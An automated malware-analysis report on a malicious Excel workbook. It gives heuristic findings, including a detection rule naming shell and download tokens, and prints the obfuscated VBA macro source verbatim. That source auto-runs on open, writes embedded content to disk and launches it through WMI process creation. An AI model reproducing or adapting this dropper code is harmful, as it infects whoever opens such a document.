MALICIOUS
108
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The OOXML file contains VBA macros, specifically a Workbook_Open macro, which is a common technique for executing malicious code as soon as the document is opened. The presence of a GetObject call together with a p-code auto-execution pattern further indicates malicious intent. The script's obfuscation and truncated content prevent a definitive analysis of its exact payload, but the overall pattern suggests it is designed to stage and execute a secondary malicious component: the visible source writes the `.Text` of what appears to be an embedded form control to a file in the workbook's own directory and launches that file through a WMI object path beginning `winmgmts:\root\cimv2:Win32_Pr…`, while no network download primitive appears anywhere in the preview.
Heuristics 4
-
VBA project inside OOXML — severity: medium — 3 related findings — rule OOXML_VBA — Document contains a VBA project (VBA macros present)
-
GetObject call — severity: high — rule OLE_VBA_GETOBJ — GetObject call — matched line in script:
Set wPozVwdmPCyEXp = GetObject(sYOpFddrVYp.w_nVLDlp).SpawnInstance_ -
VBA p-code auto-exec with execution tokens — severity: high — rule OLE_VBA_PCODE_AUTOEXEC_EXEC — Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents, where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro — severity: low — rule OLE_VBA_WBOPEN — Workbook_Open macro — matched line in script:
Private Sub Workbook_Open()
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8439 bytes |
SHA-256: 275054aa8ec129c8e42e57802dc36607e01dc1168415e78d832e7e1e702e6c90
Preview script — first 1,000 lines of the extracted script (shown verbatim as carved; the listing below is the analyzed artifact, not reviewed code)
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
BTSmHc_0HEZmv = IsError(IsError(hfa9mGb))
IsArray (IsDate(XVt8YS))
SwIOWWI = IsMissing(IsNumeric("WNwwBiH"))
lOqWUpdEspdvLsbu.s_i_F_zogoHJF_QwGHD
IsMissing (IsArray(EGQllY6))
IsDate ("UXbYPF_Sfp9Qd")
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "lRdQ_mtBs"
Function kq_aDivOmaPBNgXoNH_ZZFdVw()
s2z1nec_vEz0Pg = IsDate("W9mPqe_poJkR")
IQSAEoEbdK30K = IsObject(wOuVeV_ImyuDn)
IsNull (IsDate(GsqS0S))
kq_aDivOmaPBNgXoNH_ZZFdVw = Range("FM125")
v9j2X6_oeUrXf = IsDate(IsNumeric("c8t5Xxb_pVSR0Y"))
MJXbzqb = IsEmpty("vM5dck1_WgVOV")
IsEmpty ("QEwqVWP_7wTvv")
End Function
Function aODjNGONvsH()
wuLow7 = IsArray(tjoZL5)
l9vLq9 = IsDate(IsArray("G2MFCzd"))
vcmSOSwEmOQp = Chr(CLng((Not -103))) _
IsNull (IsNull(G2SazMC))
gkn_mBrlMwcflnwtxuA = Chr(CLng((Not -33))) _
xHWHsoDqLfxolJxaPpOyPygqf = Chr(32)
Lr_wbEjNYjSINiJizp = Chr(CLng((((-876 + 31#) - -264#) - -697))) _
IsObject (IsDate("gqv7RS4jqguS"))
HkcVgZPJzeYyDF__pREYsRS = Chr(CLng((Not -115)))
IsNull (OcAlSZ)
dU_RPfrAAv = ChrW(116)
ZjLLgXe_fitdA = IsDate(uSuTQ1_sOn8k5)
GfNUSENs_EssE = Chr(58)
ZKgAXorw_hKYJa = Chr(CLng(((-1.06566820276498E-03 * (0.24390243902439 * 861)) * -496)))
sFrMWAI = Chr(CLng((Not (0.147692307692308 * (144 + -469#)))))
NISqumCQCJkxgWmrBOcGB_c = ChrW(CLng(((-0.508196721311475 * -61) Xor 124)))
kd3Lb0_L7NGI = IsMissing(IsNull(NjxfO1C))
nKrauOIJPOcnno_eJ_LNsH = Chr(CLng((-0.209503239740821 * -463)))
AzGgWz8_XrjWxI = IsDate(IsNumeric(YV2sUZ7_qnj3la))
yVhpl_K_YiPPX_LfwRrsC_bEJSwcW = Chr(CLng((503 - xlDialogChartAddData))) _
XKMY_DCehdlbH = ChrW(CLng((125 And xlPyramidBarClustered))) _
ZBYUhBIQRvcfh = ChrW(101)
Rt2kpLa7fNYeR = IsEmpty(IsDate("UfDfc6w_TbcqdT"))
aODjNGONvsH = ChrW(119) _
+ XKMY_DCehdlbH + ChrW(CLng(((-1075 - -740#) - -440))) + NISqumCQCJkxgWmrBOcGB_c + gkn_mBrlMwcflnwtxuA + ZKgAXorw_hKYJa + ChrW(CLng((-313 - -428))) _
+ xHWHsoDqLfxolJxaPpOyPygqf + Chr(103) + ZBYUhBIQRvcfh + dU_RPfrAAv + Chr(CLng(((1265 - 244#) + (-560 - 429#)))) + sFrMWAI + vcmSOSwEmOQp + yVhpl_K_YiPPX_LfwRrsC_bEJSwcW + HkcVgZPJzeYyDF__pREYsRS + ChrW(109) _
+ nKrauOIJPOcnno_eJ_LNsH + Lr_wbEjNYjSINiJizp + GfNUSENs_EssE
YJPkQQ = IsMissing(IsObject("xcXzU3_H0VKRQ"))
IsMissing (EpO4HUseDIzsQ)
IsMissing (IsNumeric("lYw16b_B1otN"))
End Function
Attribute VB_Name = "sYOpFddrVYp"
Function ihtkTUBPUpLFqNviPkhajZT()
IsNull (IsNull(OSlm0e))
IsDate ("IoY4Trx")
cOEZTzkDYPfhH = IsObject(rsrGo1U0fXc)
IsError (IsNumeric("hnVhdBgF6o23x"))
IsEmpty (IsError(RMzj0G))
IsDate (IsObject(HfWT6Bc_oIWZRk))
aUDGLGqKn_QHDaJFrpXCYnuFgMw_h = lRdQ_mtBs.kq_aDivOmaPBNgXoNH_ZZFdVw
GTno0T = IsEmpty("Gkm8vB7Axyuf")
IsMissing ("Mgci3wzX5spH")
Twmdyh_iIL00M = IsMissing("M0JkCp_1zOvCP")
ihtkTUBPUpLFqNviPkhajZT = aUDGLGqKn_QHDaJFrpXCYnuFgMw_h
IsError (IsMissing(MerAtNuIUi2e))
IsObject (UUKlz1d)
IsArray ("GV4RDGv")
End Function
Function w_nVLDlp()
IsNumeric ("ecJpXrv")
IsDate (tMrvm6juM3w)
tZS07tC = IsDate(IsNumeric("ANj0tg0qLDRe6"))
jjEWMvpYolnCPH_cXgfIougCbze = Mid("VFiMTh\winmgmts:\root\cimv2:Win32_Pr<2iv)", 8, 29)
IsDate ("TlVm85h")
dHXd9i = IsArray(IsDate(YSuddc_dqR3wo))
IsArray ("VSb7cj")
IsError (IsNull("JEK8235_Ay1PT"))
ngPXnDG_nnLKxL = IsEmpty(BBznYjbtprh)
W4krvLj = IsDate("SmJJCXE_yo8RxB")
IsNull (IsDate("l0EMOe_b44DS"))
RFsmAEnwoQ = Range("CO77")
w_nVLDlp = Join(Array(jjEWMvpYolnCPH_cXgfIougCbze + RFsmAEnwoQ))
IsError (owdiSUY)
UOX20mnA9OT0 = IsMissing("UNG7BSo")
V9x4Ki_vy54oK = IsObject("WpXr16jnykmN")
End Function
Attribute VB_Name = "suZjjqhMIKKwO_XfJ_Np"
Attribute VB_Base = "0{6F4FE49F-E257-450C-A73F-3CFDF6F789DB}{F79837EC-6EC8-4426-AFBE-D63B94D0EA61}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function wPozVwdmPCyEXp()
L6lNSM = IsError(IsError("MMJbgGO"))
LA9cqFeN5LUE = IsEmpty(XqWEQawSgl15H)
IsError ("CPgp4isTujS")
Set wPozVwdmPCyEXp = GetObject(sYOpFddrVYp.w_nVLDlp).SpawnInstance_
IsArray ("X0updT_Uenzi")
IsDate (IsObject("pkwQS8"))
WNEIVhC = IsDate("yVwDZI_BH3LyQ")
With wPozVwdmPCyEXp
.ShowWindow = CLng(((-472 + 484#) Xor xlDataAndLabel))
End With
IsError (WpYzc3k652Qz)
fI7LHOkx2lUkE = IsError("Lg8bro")
YLAredV = IsNumeric(S60mxw_N0nSD)
End Function
Attribute VB_Name = "LAlDWGOQh_arnMxEPVSw"
Attribute VB_Base = "0{CD263F86-6132-4392-8A3C-34923620D19A}{AD82E8DB-79E2-4999-9815-8C7581EDF9EF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function CmRyWYgMDoOOXfWblq_Y_r_dHlG()
IsEmpty (IsEmpty("FOjyjEc"))
IsDate ("NQXKvzl0ESO")
IsDate (IsDate(VsIjNK))
kWO9ncG = IsEmpty(BXdIK9_ZVwve)
IsEmpty (IsDate(FMvEFB))
FxcjEEIVgvsz = Chr(CLng((xlDialogActivate And xlDialogRowHeight)))
lqd_HWIuNky = ChrW(CLng((124 And 118)))
Y44putM = IsArray(IsNull("G4qJPt2lki3N"))
PP_BNPJV_P = Chr(118)
dtewQVe5pXIu = IsMissing(CUhhvk)
h_MxpribSNKmNsKxeqYOXRXIaEEkT = ChrW(92)
IsArray (DCFjxV)
B_MPcUiZfsnSMupY = ChrW(CLng((Not -59)))
NyCOxW = IsDate(IsMissing("NkHtt0"))
WZ6qwN = IsEmpty(IsEmpty("LlA1m0evJAC"))
CmRyWYgMDoOOXfWblq_Y_r_dHlG = ChrW(CLng((0.113225499524263 * ((0.699046754425783 * 2203) - 489#)))) + ChrW(105) + Chr(110) _
+ Chr(CLng((Not (xlDialogWorkgroup + (-1263 + 954#))))) + FxcjEEIVgvsz + ChrW(CLng((((-655 - -633#) + 735#) - 604))) _
+ ChrW(CLng((Not (-658 - -541#)))) + ChrW(115) + ChrW(CLng(((1213 + -340#) + (-941 - -126#)))) _
+ Chr(114) _
+ Chr(111) + Chr(CLng(((-1.25027455353372E-04 * -981) * 905))) + lqd_HWIuNky + h_MxpribSNKmNsKxeqYOXRXIaEEkT + ChrW(CLng((xlDialogFormulaFind - -35))) + Chr(CLng((xlExcel3 Xor 116))) + Chr(CLng(((xlDialogTabOrder - 297#) Xor (1.32013201320132E-02 * 909)))) + PP_BNPJV_P + ChrW(CLng((Not -51))) + B_MPcUiZfsnSMupY + Chr(CLng((-471 - -558))) + Chr(CLng((xlConeCol And xlDialogRowHeight))) + Range("HF116") + Replace(",/5cC,/5cC,/5cC,/5cCProcess", ",/5cC", "") _
IsMissing (IsDate("U7qekmk"))
MloBIOq_9fp5M = IsArray("GedR3Gf")
IsDate (IsArray("Bxq5GBb"))
End Function
Attribute VB_Name = "lOqWUpdEspdvLsbu"
Function s_i_F_zogoHJF_QwGHD()
Dim hqRREKewYDJToW_Pe_pG_IOaAqXxj As String
A2WOgLX_AMhn2 = IsMissing(IsEmpty("XegRZUZShB6"))
IsEmpty (IsDate("xIg4ogv"))
hqRREKewYDJToW_Pe_pG_IOaAqXxj = Replace(suZjjqhMIKKwO_XfJ_Np.Lk_MlbhdEixFU_ioQgheowZg.Text, "viXKLi;kOJt!", "")
Qslv4b_lyrmWE = IsEmpty(IsError("IO2OlE_jt1aVY"))
IsEmpty (DzFBzM)
ZhALScm_TBMak = IsMissing(OodALZ)
Open Application.ActiveWorkbook.Path & sYOpFddrVYp.ihtkTUBPUpLFqNviPkhajZT For Binary As #CLng((xlSpeakByColumns Xor xlDone))
L0Qz8Efc1X9Jt = IsArray(IsDate(SgftKYh))
Z3e0YHKTlMi = IsMissing(IsNumeric(Vb6tqf_FMQzC1))
Put #CLng((xlArrowHeadLengthShort And xlArabicStrictAlefHamza)), , hqRREKewYDJToW_Pe_pG_IOaAqXxj
IsNull (IsEmpty("Tx8TXme"))
wDr3w0o = IsArray("Rh3Cx97_T0GCse")
Close #CLng(((xlDialogFileSharing + -570#) - -90))
IsEmpty ("g9ZDy8gjipKP")
IsNull (IsArray(D93cV5))
bNeQcrNhumRjV_pbFLQR_f
IsObject (IsDate(JWXxEB))
IsError (IsNumeric("Zy23jm_PREdgt"))
End Function
Function bNeQcrNhumRjV_pbFLQR_f()
PAH0U6F = IsDate(SN0jlRUa2fp5)
EmUbBmq = IsArray(IsObject("NU4nKG"))
IsError (IsNull(Rrceccx))
With GetObject(LAlDWGOQh_arnMxEPVSw.CmRyWYgMDoOOXfWblq_Y_r_dHlG)
.Create lRdQ_mtBs.aODjNGONvsH & Chr(34) & Application.ActiveWorkbook.Path & sYOpFddrVYp.ihtkTUBPUpLFqNviPkhajZT & Chr(34), Null, suZjjqhMIKKwO_XfJ_Np.wPozVwdmPCyEXp
End With
IsNumeric (IsObject("Llm8Ukq"))
NnZXSAU = IsArray(JuWuijT)
ErB1uN8_e8eE1S = IsNull(IsMissing(xiKX72))
IsNull (IsError(egZDybRiGDVZ))
End Function
|
|||
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 57344 bytes |
SHA-256: 13e9bca0e36e93585fa70e507fa2b11f33ce395a1c52b32aac3bfde85968288b